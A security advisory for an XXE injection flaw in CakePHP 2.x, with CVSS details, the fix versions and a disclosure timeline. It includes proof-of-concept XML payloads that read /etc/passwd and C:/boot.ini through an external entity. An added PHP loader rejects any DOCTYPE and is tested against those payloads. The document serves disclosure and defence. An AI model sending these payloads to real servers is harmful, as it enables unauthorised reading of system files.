CakePHP 2.2.0-RC2 XXE Injection

2012-07-17 / 2012-10-16
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-264


Overall CVSS score: 5/10
Impact: 2.9/10
Exploitability: 10/10
Required access: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# Exploit title: CakePHP XXE injection
# Date: 01.07.2012
# Software Link: http://www.cakephp.org
# Vulnerable version: 2.x - 2.2.0-RC2
# Tested on: Windows and Linux
# Author: Pawel Wylecial
# http://h0wl.pl

1. Background

Short description from the project website: "CakePHP makes building web applications simpler, faster and require less code."

2. Vulnerability

CakePHP is vulnerable to XML eXternal Entity injection. The class responsible for building XML (it uses PHP SimpleXML) does allow local file inclusion.

3. Proof of Concept

Linux:

<!DOCTYPE cakephp [
<!ENTITY payload SYSTEM "file:///etc/passwd" >]>
<request>
<xxe>&payload;</xxe>
</request>

Windows:

<!DOCTYPE cakephp [
<!ENTITY payload SYSTEM "file:///C:/boot.ini" >]>
<request>
<xxe>&payload;</xxe>
</request>

4. Fix

Fix applied in version 2.2.1 and 2.1.5. See official security release:
http://bakery.cakephp.org/articles/markstory/2012/07/14/security_release_-_cakephp_2_1_5_2_2_1

5. Timeline

1.07.2012 - vulnerability reported
13.07.2012 - response from CakePHP
14.07.2012 - confirmed and fix release

References:

http://h0wl.pl
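One way to refuse the documents from section 3 before SimpleXML sees them, as an added example (not CakePHP's code and not the advisory author's). The function name parseUntrustedXml is hypothetical and PHP 7.0 or later is assumed.

```php
<?php
// Added example: strict loader for untrusted XML (hypothetical function name).
function parseUntrustedXml(string $xml): SimpleXMLElement
{
    if ($xml === '') {
        throw new InvalidArgumentException('empty XML body');
    }
    $prevErrors = libxml_use_internal_errors(true);   // collect parse errors quietly
    // Before PHP 8.0, switch the external entity loader off for this parse.
    $prevLoader = PHP_VERSION_ID < 80000 ? libxml_disable_entity_loader(true) : null;
    try {
        $dom = new DOMDocument();
        // No LIBXML_NOENT or LIBXML_DTDLOAD; LIBXML_NONET also blocks network access.
        if (!$dom->loadXML($xml, LIBXML_NONET)) {
            throw new InvalidArgumentException('malformed XML');
        }
        // A request body has no need for a DTD, so any DOCTYPE is refused.
        foreach ($dom->childNodes as $node) {
            if ($node->nodeType === XML_DOCUMENT_TYPE_NODE) {
                throw new InvalidArgumentException('DOCTYPE not allowed');
            }
        }
        $sx = simplexml_import_dom($dom);
        if (!$sx instanceof SimpleXMLElement) {
            throw new InvalidArgumentException('could not import document');
        }
        return $sx;
    } finally {
        libxml_clear_errors();
        libxml_use_internal_errors($prevErrors);
        if ($prevLoader !== null) {
            libxml_disable_entity_loader($prevLoader);
        }
    }
}
// Constructed inputs: a plain request and the Linux document from section 3.
$samples = [
    'plain'   => '<request><xxe>hello</xxe></request>',
    'doctype' => '<!DOCTYPE cakephp [ <!ENTITY payload SYSTEM "file:///etc/passwd" >]>'
               . '<request><xxe>&payload;</xxe></request>',
];
foreach ($samples as $name => $xml) {
    try {
        echo $name, ': accepted, xxe=', (string) parseUntrustedXml($xml)->xxe, "\n";
    } catch (InvalidArgumentException $e) {
        echo $name, ': rejected (', $e->getMessage(), ")\n";
    }
}
```

Rejecting every DOCTYPE is stricter than only disabling entity substitution, which suits request bodies that never carry a DTD.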



Copyright 2024, cxsecurity.com

 
